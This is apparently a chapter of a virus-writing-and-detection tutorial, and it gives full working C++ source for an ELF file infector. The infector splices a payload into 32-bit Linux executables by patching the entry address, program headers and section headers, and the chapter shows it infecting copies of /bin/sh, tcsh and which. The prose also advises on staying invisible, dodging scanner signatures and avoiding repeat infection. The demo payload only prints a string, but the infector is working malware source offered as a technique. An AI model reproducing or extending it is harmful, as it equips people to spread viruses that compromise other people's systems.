One step closer to the edge

 

Don't be too proud of this technological terror you've constructed. The ability to destroy a planet is insignificant next to the power of the Force.

 Darth Vader

This section is about a first-stage infector: a program that inserts our code into any executable we specify on the command line.

This code could easily be squeezed into a single function. But for clarity I split it into parts that manipulate a central data structure. And just for the hell of it I coded it in C++. This way I can present the pieces in random order.

Source - class Target.

#include <elf.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string>

class Target
{
public:
  Target(const char* filename);
  ~Target();
  bool isOpen() { return fd_dst != -1; }
  bool isSuitable();
  unsigned newEntryAddr();
  bool patchEntryAddr();
  bool patchPhdr();
  bool patchShdr();
  bool copyAndInfect();

private:
  enum { INFECTION_SIZE = 0x1000 };
  static const unsigned char infection[INFECTION_SIZE + 1];

  int fd_dst; /* opened write-only */
  int fd_src; /* opened read-only */

  off_t filesize;

  /* start of memory-mapped image, b means byte */
  union { void* v; unsigned char* b; Elf32_Ehdr* ehdr; } p;

  /* pointer to first program header (in the mapped image) */
  Elf32_Phdr* phdr;
  
  /* offset to first byte after code segment (in file) */
  size_t top;

  /* start of host code (in memory) */
  Elf32_Addr original_entry;
};

INFECTION_SIZE

The value of INFECTION_SIZE exceeds actual code size by far. But it is the only amount that works. The reason for this is buried in the ELF specification.

[…] executable and shared object files must have segment images whose file offsets and virtual addresses are congruent, modulo the page size.

Virtual addresses and file offsets for the SYSTEM V architecture segments are congruent modulo 4 KB (0x1000) or larger powers of 2. Because 4 KB is the maximum page size, the files will be suitable for paging regardless of physical page size. […]

Let's take another look at the output of readelf. The quote above means that the last three hexadecimal digits of Offset must equal the last three hexadecimal digits of VirtAddr. This is the case for every program header.

So unless we change VirtAddr as well (which means relocation of every access to a global variable), we are stuck with 0x1000.
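The congruence rule is easy to check by hand, but a few lines of code make it explicit. The following is only a sketch: the helper names isCongruent and stillCongruentAfterInsert are made up for illustration, and the page size of 0x1000 is taken from the quote above.

```cpp
#include <cstdint>

// Hypothetical helper: true if a segment's file offset and virtual
// address are congruent modulo the page size, as the quote demands.
bool isCongruent(std::uint32_t offset, std::uint32_t vaddr,
                 std::uint32_t pageSize = 0x1000)
{
  return (offset % pageSize) == (vaddr % pageSize);
}

// Hypothetical helper: move a file offset up by the size of an inserted
// block and report whether the unchanged virtual address still matches.
bool stillCongruentAfterInsert(std::uint32_t offset, std::uint32_t vaddr,
                               std::uint32_t inserted)
{
  return isCongruent(offset + inserted, vaddr);
}
```

With illustrative values, an offset of 0x4a0 and a VirtAddr of 0x080494a0 stay congruent after an insert of 0x1000 bytes, but not after an insert of 0x1a bytes. Only whole multiples of the page size leave the last three hexadecimal digits alone.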

Target::infection

Up to now our code was intended to be stand-alone. The obvious fix is to replace the call to exit(2) with a jmp. But I think it's a better idea to let our code end with an unsuspicious ret instead. And we can put the matching push at the start of the code to have the actual return address at a constant location. And while we are at it, saving all registers and the flags can't be bad.

Source - infection.asm.

		BITS 32

		push	dword 0		; replace with original entry address
		pushf
		pusha

		push	byte 4
		pop	eax		; eax = 4 = write(2)
		xor	ebx,ebx
		inc	ebx		; ebx = 1 = stdout
		mov	ecx,0x08048001	; ecx = magic address
		push	byte 3
		pop	edx		; edx = 3 = three characters
		int	0x80

		popa
		popf
		ret

Command.

#!/bin/sh
nasm -f bin src/one_step_closer/infection.asm \
	-o tmp/one_step_closer/infection
ndisasm -U tmp/one_step_closer/infection \
| src/evil_magic/ndisasm.pl \
	'-identfier=Target::infection' \
	'-size=INFECTION_SIZE + 1'

Output - infection.

const unsigned char Target::infection[INFECTION_SIZE + 1] =
  "\x68\x00\x00\x00\x00"   /* 00000000: push dword 0x0       */
  "\x9C"                   /* 00000005: pushf                */
  "\x60"                   /* 00000006: pusha                */
  "\x6A\x04"               /* 00000007: push byte +0x4       */
  "\x58"                   /* 00000009: pop eax              */
  "\x31\xDB"               /* 0000000A: xor ebx,ebx          */
  "\x43"                   /* 0000000C: inc ebx              */
  "\xB9\x01\x80\x04\x08"   /* 0000000D: mov ecx,0x8048001    */
  "\x6A\x03"               /* 00000012: push byte +0x3       */
  "\x5A"                   /* 00000014: pop edx              */
  "\xCD\x80"               /* 00000015: int 0x80             */
  "\x61"                   /* 00000017: popa                 */
  "\x9D"                   /* 00000018: popf                 */
  "\xC3"                   /* 00000019: ret                  */
  ;

You might wonder why the character array has INFECTION_SIZE + 1 elements. Well, infective code can grow to exactly INFECTION_SIZE bytes, and string constants need one additional byte for zero-termination. And should the code ever exceed that limit the compiler will issue an error.
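The effect of the extra element can be reproduced on a small scale. This is a sketch with a hypothetical DEMO_SIZE of 4 standing in for INFECTION_SIZE; the array names are made up as well.

```cpp
#include <cstddef>

enum { DEMO_SIZE = 4 };  // hypothetical stand-in for INFECTION_SIZE

// Four payload bytes plus the implicit terminating zero fill the array.
const unsigned char demo[DEMO_SIZE + 1] = "\x01\x02\x03\x04";

// A fifth payload byte would need six elements. In C++ this line is
// rejected by the compiler, so it is left commented out:
// const unsigned char tooLong[DEMO_SIZE + 1] = "\x01\x02\x03\x04\x05";

// Shorter literals are fine; the remaining elements are zero-filled.
const unsigned char padded[DEMO_SIZE + 1] = "\x01";
```

Here sizeof(demo) is 5 and demo[4] is the terminating zero. Note that C is more lenient than C++ and accepts a string literal that fills the array without leaving room for the terminator.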

main

Nothing special here. Though you could object to the use of fprintf(3) instead of cerr. But then perror(3) is the only type of diagnostic message you will find below.

Source - main.

int main(int argc, char** argv)
{
  char** pp = argv;
  const char* p;
  while(0 != (p = *++pp))
  {
    fprintf(stderr, "Infecting copy of %s... ", p);
    Target target(p);
    if (target.isOpen()
	&& target.isSuitable()
	&& target.patchEntryAddr()
	&& target.patchPhdr()
	&& target.patchShdr()
	&& target.copyAndInfect()
    )
      fprintf(stderr, "Ok\n");
  }
  return 0;
}

The opening

Modifying a file in place, as opposed to writing a copy, is possible but difficult. And between the first and the final modification the contents of the target are invalid. Imagine a worst-case scenario of a virus infecting /bin/sh being interrupted by a power failure (or an emergency shutdown by a hectic admin).

There are a few approaches to changing a file while copying it.

Using MAP_PRIVATE for the flags argument of mmap(2) activates copy-on-write semantics. You can read and write as if you had chosen the read-in-one-go method, but the implementation is more efficient. Unmodified pages are loaded directly from the file. Under low-memory conditions these pages can be discarded without saving them in swap space.
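Copy-on-write can be observed on a harmless scratch file. The function below is a minimal sketch, not part of the infector: the name privateMappingLeavesFileIntact and the path under /tmp are assumptions chosen for the demonstration.

```cpp
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Hypothetical demo: returns true if a write through a MAP_PRIVATE
// mapping leaves the underlying file untouched.
bool privateMappingLeavesFileIntact()
{
  char path[] = "/tmp/cow_demo_XXXXXX";  // assumed scratch location
  int fd = mkstemp(path);
  if (fd < 0)
    return false;
  unlink(path);                          // file lives until fd is closed

  const char original[] = "hello";
  bool ok = false;
  if (write(fd, original, sizeof(original)) == (ssize_t)sizeof(original))
  {
    void* v = mmap(0, sizeof(original), PROT_READ | PROT_WRITE,
                   MAP_PRIVATE, fd, 0);
    if (v != MAP_FAILED)
    {
      char* mem = static_cast<char*>(v);
      mem[0] = 'J';                      // modifies the private copy only

      /* read the file again, bypassing the mapping */
      char onDisk[sizeof(original)];
      ok = pread(fd, onDisk, sizeof(onDisk), 0) == (ssize_t)sizeof(onDisk)
        && memcmp(onDisk, original, sizeof(original)) == 0
        && mem[0] == 'J';
      munmap(v, sizeof(original));
    }
  }
  close(fd);
  return ok;
}
```

The mapping sees the modified byte while pread(2) still returns the original contents. With MAP_SHARED and a writable file descriptor the change would reach the file instead.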

Source - Constructor.

Target::Target(const char* src_filename)
: fd_dst(-1), fd_src(-1)
{
  const char* base = strrchr(src_filename, '/');
  std::string dst_filename(base == 0 ? src_filename : base + 1);
  dst_filename += "_infected";

  fd_src = open(src_filename, O_RDONLY);
  if (fd_src >= 0)
  {
    filesize = lseek(fd_src, 0, SEEK_END);
    if ((off_t)-1 != filesize)
    {
      p.v = mmap(0, filesize, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd_src, 0);
      if (MAP_FAILED != p.v)
      {
        fd_dst = open(dst_filename.data(), O_WRONLY | O_CREAT | O_TRUNC, 0775);
	if (fd_dst >= 0)
	  return;
	perror("open");
      }
      else
	perror("mmap");
    }
    else
      perror("lseek");
  }
  else
    perror("open");
}

Source - Destructor.

Target::~Target()
{
  if (p.v != 0)
    munmap(p.v, filesize);
  close(fd_src);
  close(fd_dst);
}

isSuitable

A visible virus is a dead virus. Breaking things is quite the opposite of invisibility. So before you think about polymorphism and stealth mechanisms you should make sure your code does nothing unexpected.

On the other hand exhaustive checks of target files will severely increase code size. And verifying signatures and other constant values is likely to make the virus code itself a constant signature. A better approach is to compare the target with the host executable currently running the virus.

A related issue is avoidance of multiple infections. It might take a while until increased file size gets noticed. But imagine a /bin/sh infected with a few dozen instances of the same virus. The runtime overhead of all these instances trying to find and infect other executables (either sequentially or in parallel forked processes) will significantly slow down every single shell script.

Obviously any presence indicator can be used by heuristic scanners. My recommendation is to use an innocent property that could also be matched by regular executables. It is not a problem if your checking routine rejects some suitable targets.

For this example I just declare a bug to be a feature. Since INFECTION_SIZE is required to be 0x1000 bytes, a duplicate infection is impossible by design.

Source - isSuitable.

bool Target::isSuitable()
{
  enum
  {
    CMP_SIZE_1 = offsetof(Elf32_Ehdr, e_entry),
    CMP_SIZE_2 = offsetof(Elf32_Ehdr, e_shentsize)
    - offsetof(Elf32_Ehdr, e_flags)
  };
  Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000;
  Elf32_Phdr* self_phdr = (Elf32_Phdr*)((char*)self + self->e_phoff);
  phdr = (Elf32_Phdr*)(p.b + p.ehdr->e_phoff);

  if (0 != memcmp(&p.ehdr->e_ident, &self->e_ident, CMP_SIZE_1))
    return false;
  if (p.ehdr->e_phoff != self->e_phoff)
    return false;
  if (0 != memcmp(&p.ehdr->e_flags, &self->e_flags, CMP_SIZE_2))
    return false;

  /* the type of these headers must be PT_LOAD */
  if (phdr[2].p_type != self_phdr[2].p_type)
    return false;
  if (phdr[3].p_type != self_phdr[3].p_type)
    return false;

  /* a code segment with trailing 0-bytes makes no sense, anyway */
  if (phdr[2].p_filesz != phdr[2].p_memsz)
    return false;

  top = phdr[2].p_offset + phdr[2].p_filesz;

  /* distance between code and data segment (in memory) */
  size_t delta = phdr[3].p_vaddr - phdr[2].p_vaddr - phdr[2].p_memsz - 1;
  return delta >= INFECTION_SIZE;
}

Patch entry address

Without this function the behavior of the target is not modified. This can be used for vaccination, in the true meaning of the word: Infection with a deactivated mutation makes the target immune against less friendly attackers.

Source - patchEntryAddr.

bool Target::patchEntryAddr()
{
  original_entry = p.ehdr->e_entry;
  p.ehdr->e_entry = newEntryAddr();
  return true; /* this implementation can't fail */
}

Source - newEntryAddr.

unsigned Target::newEntryAddr()
{
  return phdr[2].p_vaddr + phdr[2].p_filesz;
}

Patching program headers

Source - patchPhdr.

bool Target::patchPhdr()
{
  phdr[2].p_filesz += INFECTION_SIZE;
  phdr[2].p_memsz += INFECTION_SIZE;

  unsigned nr = p.ehdr->e_phnum;
  Elf32_Phdr* entry = phdr;
  while(nr-- > 0)
  {
    if (entry->p_offset > top)
      entry->p_offset += INFECTION_SIZE;
    entry++;
  }
  return true; /* this implementation can't fail */
}

Patching section headers

This part is not strictly required. The resulting executable works without it. But readelf and strip will bitterly complain.

Source - patchShdr.

bool Target::patchShdr()
{
  unsigned nr = p.ehdr->e_shnum;
  Elf32_Shdr* shdr = (Elf32_Shdr*)(p.b + p.ehdr->e_shoff);
  while(nr-- > 0)
  {
    if (shdr->sh_offset > top)
      shdr->sh_offset += INFECTION_SIZE;
    shdr++;
  }
  p.ehdr->e_shoff += INFECTION_SIZE;
  return true; /* this implementation can't fail */
}

Copy & infect

Source - copyAndInfect.

bool Target::copyAndInfect()
{
  /* first part of original target */
  write(fd_dst, p.b, top);

  /* first byte is the opcode for "push" */
  write(fd_dst, infection, 1);

  /* next four bytes are the address to "ret" to */
  write(fd_dst, &original_entry, sizeof(original_entry));

  /* rest of infective code */
  write(fd_dst, infection + 5, INFECTION_SIZE - 5);

  /* rest of original target */
  write(fd_dst, p.b + top, filesize - top);

  return true;
}

Off we go

Command - build.

#!/bin/sh
step=${1:-one}
g++ -Wall -D PATCH_ENTRY_ADDR=\"patch_entry_addr/$step.inc\" \
	-I out/one_step_closer \
	-o tmp/one_step_closer/$step/infector \
	src/one_step_closer/*.cxx \
&& cd tmp/one_step_closer/$step \
&& ./infector /bin/sh /bin/tcsh /usr/bin/which

Output - build.

Infecting copy of /bin/sh... Ok
Infecting copy of /bin/tcsh... Ok
Infecting copy of /usr/bin/which... Ok

A simple shell script will do as test.

Command - test sh.

#! tmp/one_step_closer/one/sh_infected

echo $BASH
echo $BASH_VERSION
which which
tmp/one_step_closer/one/which_infected which
tmp/one_step_closer/one/tcsh_infected -fc 'echo $version'

Output - test sh.

ELF/home/alba/virus-writing-and-detection-HOWTO/tmp/one_step_closer/one/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm

The Force is strong with this one.